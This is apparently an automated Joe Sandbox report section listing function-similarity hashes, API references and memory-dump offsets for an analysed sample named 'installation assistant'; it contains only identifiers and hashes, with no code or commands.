                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                                                                                • Instruction ID: 48daf6472ebc404d9fc1c730bdf869231d4329ebb48812d7fe4a4a565ee497d7
                                                                                                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9C1097
                                                                                                                  • Part of subcall function 6C9C41D6: __EH_prolog.LIBCMT ref: 6C9C41DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $ $*$0UJ$@$@
                                                                                                                • API String ID: 3519838083-862571645
                                                                                                                • Opcode ID: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                                                                                                • Instruction ID: 8f2f933d5eaee07b2ebfce0602185cc48482b05f32600555519b264ffa5e3e1a
                                                                                                                • Opcode Fuzzy Hash: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                                                                                                • Instruction Fuzzy Hash: F0336E30E002599FDF15CFA4C894BEDBBB5AF65308F1080A9E4096BA55DB70DE89CF52
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA138A4
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13C4A
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13C78
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13D18
                                                                                                                  • Part of subcall function 6CA1536D: __EH_prolog.LIBCMT ref: 6CA15372
                                                                                                                  • Part of subcall function 6CA1540E: __EH_prolog.LIBCMT ref: 6CA15413
                                                                                                                  • Part of subcall function 6CA14E78: __EH_prolog.LIBCMT ref: 6CA14E7D
                                                                                                                  • Part of subcall function 6CA0F24A: __EH_prolog.LIBCMT ref: 6CA0F24F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__aulldiv
                                                                                                                • String ID: L$b
                                                                                                                • API String ID: 604474441-3566554212
                                                                                                                • Opcode ID: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                                                                                                • Instruction ID: 5e9d49f1ace3473c5198e41ef451f4971a462f6dd5bb06abc8690b98706a398c
                                                                                                                • Opcode Fuzzy Hash: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                                                                                                • Instruction Fuzzy Hash: 18E28D70D09299DFDF15CFA8CA90ADCBBB5BF15308F148099D449A7B81DB30AE89CB51
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA064B1
                                                                                                                  • Part of subcall function 6CA0793B: __EH_prolog.LIBCMT ref: 6CA07940
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 1$`)K$h)K
                                                                                                                • API String ID: 3519838083-3935664338
                                                                                                                • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                                                                                • Instruction ID: 3128f6f4a828d0671e5898a1109b5cbf12c1b8c3da48baac3e45b0589a7a3665
                                                                                                                • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                                                                                • Instruction Fuzzy Hash: 2BF27D70E00648DFDB11CBA8D888BDDBBB5AF59348F284499E849EB741DB709AC5CF11
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9F8EF4
                                                                                                                  • Part of subcall function 6C9FC622: __EH_prolog.LIBCMT ref: 6C9FC627
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $h%K
                                                                                                                • API String ID: 3519838083-1737110039
                                                                                                                • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                                                                                • Instruction ID: 103c6d8f8a4af69d1bd5da1f3328b5fb4f49e867b53abdc5535519c169c8566f
                                                                                                                • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                                                                                • Instruction Fuzzy Hash: 0C536830901258DFDB15CFA4C994BEDBBB4AF29308F2440D9D469A7691DB70EE8ACF11
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $J
                                                                                                                • API String ID: 3519838083-1755042146
                                                                                                                • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                                                                                • Instruction ID: 8aa6512c43f8bd41438ace6694453f4c55f23133234720171b6478c3a4417da8
                                                                                                                • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                                                                                • Instruction Fuzzy Hash: 63E2CF30A05249DFEF01CFA8E698BDDBBB1AF0534CF284198E855AB681C774DD85CB61
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9D4CE5
                                                                                                                  • Part of subcall function 6C9AAC2A: __EH_prolog.LIBCMT ref: 6C9AAC2F
                                                                                                                  • Part of subcall function 6C9AC6A6: __EH_prolog.LIBCMT ref: 6C9AC6AB
                                                                                                                  • Part of subcall function 6C9D4A0E: __EH_prolog.LIBCMT ref: 6C9D4A13
                                                                                                                  • Part of subcall function 6C9D4837: __EH_prolog.LIBCMT ref: 6C9D483C
                                                                                                                  • Part of subcall function 6C9D8143: __EH_prolog.LIBCMT ref: 6C9D8148
                                                                                                                  • Part of subcall function 6C9D8143: ctype.LIBCPMT ref: 6C9D816C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ctype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1039218491-3916222277
                                                                                                                • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                                                                                • Instruction ID: fdbb81d0f738d1d4b11f85a27ce0f154c54a755b93d9ec53157d6e756f8c26dc
                                                                                                                • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                                                                                • Instruction Fuzzy Hash: 7A038C30805689DEDF15CFA4C940BDCBBB4AF35308F25809AE44577A91DB34EB8ADB61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3J$`/J$`1J$p0J
                                                                                                                • API String ID: 0-2826663437
                                                                                                                • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                                                                                • Instruction ID: 0c155f6c437a91db25183a96c20239582381a19f1271f4def74791d204133403
                                                                                                                • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                                                                                • Instruction Fuzzy Hash: 3541F772F10A200AB3488F3A8C855667BC3C7CA346B4AC23DD5A5CB6D9DA7DC44782A4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: W
                                                                                                                • API String ID: 3519838083-655174618
                                                                                                                • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                                                                                • Instruction ID: c4321883003be9874a188d7439a34b5b5756950687c249c400edc7202a57a9f7
                                                                                                                • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                                                                                • Instruction Fuzzy Hash: 61B27B74A05259DFDB01CFA8C888B9DBBF8AF49308F244099E865EB751C775DD42CBA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-3916222277
                                                                                                                • Opcode ID: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                                                                                                • Instruction ID: f9b5810b1494482a5c354ac5f5e9ee01c64ae12b9632ceb29b560d8c84f55cae
                                                                                                                • Opcode Fuzzy Hash: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                                                                                                • Instruction Fuzzy Hash: 4292B131905249DFDB06CFA8C944BEEBBB5BF69308F244098E815AB791CB71DE45CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-3916222277
                                                                                                                • Opcode ID: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                                                                                                • Instruction ID: 1acb7dac005784eb6af139ba2bacacd52a594a6b1b10de676bc80f7453f6e8e4
                                                                                                                • Opcode Fuzzy Hash: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                                                                                                • Instruction Fuzzy Hash: DF225770A002499FDB14CFA8D494BAEBBF0FF18308F148559E8599B782D775E989CF90
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9F289B
                                                                                                                  • Part of subcall function 6C9F3FC9: __EH_prolog.LIBCMT ref: 6C9F3FCE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @ K
                                                                                                                • API String ID: 3519838083-4216449128
                                                                                                                • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                                                                                • Instruction ID: f2b2d59627947d4ddff2dbb4d140caef0227b4b3c1a831e402b9677c36985d11
                                                                                                                • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                                                                                • Instruction Fuzzy Hash: 55D10830D04A868FDB15CFA4C4987EEB7B9FF54318F15816AD825ABA84CB74D887CB11
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: x=J
                                                                                                                • API String ID: 3519838083-1497497802
                                                                                                                • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                                                                                • Instruction ID: e922cbdd31518868e25da18e0aa0346f2a452bcaa6e9d5dc000373a04a42bbf3
                                                                                                                • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                                                                                • Instruction Fuzzy Hash: 5691E031D11219DACF04DFE9C891AEDB7B9EF2530CF20806AE851A7A54DB31DA4BCB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                                                                                                • Instruction ID: a97dc30f78139ce2d914fb77fc4b37d62be6b92b8f53b64025c2c04cfef471ec
                                                                                                                • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                                                                                                • Instruction Fuzzy Hash: D0B27C30A08698CFDB21CF69C590B9EBBF1BF04308F184599D59A97E81D770A9C9CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @4J$DsL
                                                                                                                • API String ID: 0-2004129199
                                                                                                                • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                                                                                                • Instruction ID: 51755509b7c2b0ef131ea2ba632810d1a4fdc6812b97ff135cff4ffe733ad5b7
                                                                                                                • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                                                                                                • Instruction Fuzzy Hash: 0E217E37AA49564BD74CCA28EC33EB96680E744305F89527EE94BCB7D1DF6D8800C648
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9C340F
                                                                                                                  • Part of subcall function 6C9C4137: __EH_prolog.LIBCMT ref: 6C9C413C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                                                                                                • Instruction ID: a87dbc04abce8764ca937588f770720b8168cfa000a4146a0aa1b36bc17a47c7
                                                                                                                • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                                                                                                • Instruction Fuzzy Hash: 20626971A04259DFDF15CFA4C890BEEBBB5BF18308F14409AE815ABA80D774DA45CF92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: YA1
                                                                                                                • API String ID: 0-613462611
                                                                                                                • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                                                                                                • Instruction ID: 6dfc436bf18d502fc8fbd970d97588bf76b2b96fd2527e1ec62f0506a8fb50cb
                                                                                                                • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                                                                                                • Instruction Fuzzy Hash: 6A42C37060D3818FC315DF29D49069ABBE2EFD9308F184A6DE4D58BB51D731D98ACB82
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv
                                                                                                                • String ID:
                                                                                                                • API String ID: 3732870572-0
                                                                                                                • Opcode ID: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                                                                                                • Instruction ID: 03c8a5486eb027705dad85f8eee1a8251df315e698cd2e944ccb478cf7cffa00
                                                                                                                • Opcode Fuzzy Hash: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                                                                                                • Instruction Fuzzy Hash: D2E17E716083458FD724CF29C880AAAB7F5FFC8314F148A2EE9598B755D730E985CB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                                                                                                • Instruction ID: e9a715a62a80846b4352c49b0a9a77580a176b3d5808d8db6b517deaf5da6fcf
                                                                                                                • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                                                                                                • Instruction Fuzzy Hash: A2F15770A01249DFCB14CFA4C590BEDBBB1BF15308F1481A9D469ABA52D770EA5ACF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                                                                                                • Instruction ID: f67e69749d25728be1a12c244d81458fd035ff8b2564b7c7a9879d14e8a388de
                                                                                                                • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                                                                                                • Instruction Fuzzy Hash: DA324AB1A083058FC318CF5AC48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                                                                                                • Instruction ID: f17f5e84b0cc47c4f5165abb1afabfa0539b5ed78ddc01c1c43fb9e9851911ca
                                                                                                                • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                                                                                                • Instruction Fuzzy Hash: E11207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568BC6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aullrem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3758378126-0
                                                                                                                • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                                                                                                • Instruction ID: 35b4c80575528d10a334a345b26c150aa17ee0f91fa8259cffd428bf19f18b37
                                                                                                                • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                                                                                                • Instruction Fuzzy Hash: 1951E971A052559BD710CF9EC4C02EEFBF6EF79214F18C05EE88897242D27A999BC760
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                                                                                                • Instruction ID: 3ea843ebe554afa887c2d880e6ae3ee7842e6ca5c784ddb2db66d27d08684701
                                                                                                                • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
